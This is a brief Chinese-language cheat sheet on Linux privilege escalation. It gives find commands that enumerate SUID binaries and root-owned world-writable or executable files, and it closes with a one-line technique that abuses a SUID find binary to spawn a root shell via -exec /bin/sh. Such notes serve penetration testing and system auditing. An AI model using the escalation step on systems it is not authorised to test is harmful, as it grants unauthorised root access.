目录
查找SUID
查看具有suid 权限的可执行二进制程序
find / -perm -4000 -type f 2>/dev/null
或
find / -perm -u=s -type f 2>/dev/null
-perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限
-type:d(目录)f(文件)c(字符设备文件)b(块设备文件)
查找root权限可写文件
其它用户也可以写
find / -user root -type f -perm -o=w 2>/dev/null查找root权限可写、可执行文件
其它用户也可以写、执行
find / -user root -type f -perm -o=w+x -name *.py 2>/dev/null查找当前用户可读文件
find / -type f -user 用户 2>/dev/null | grep -v "/proc/" | grep -v "/sys/"find提权
若find命令suid在输出结果中,执行如下代码,提权
touch 123.txt
find 123.txt -exec "/bin/sh" \;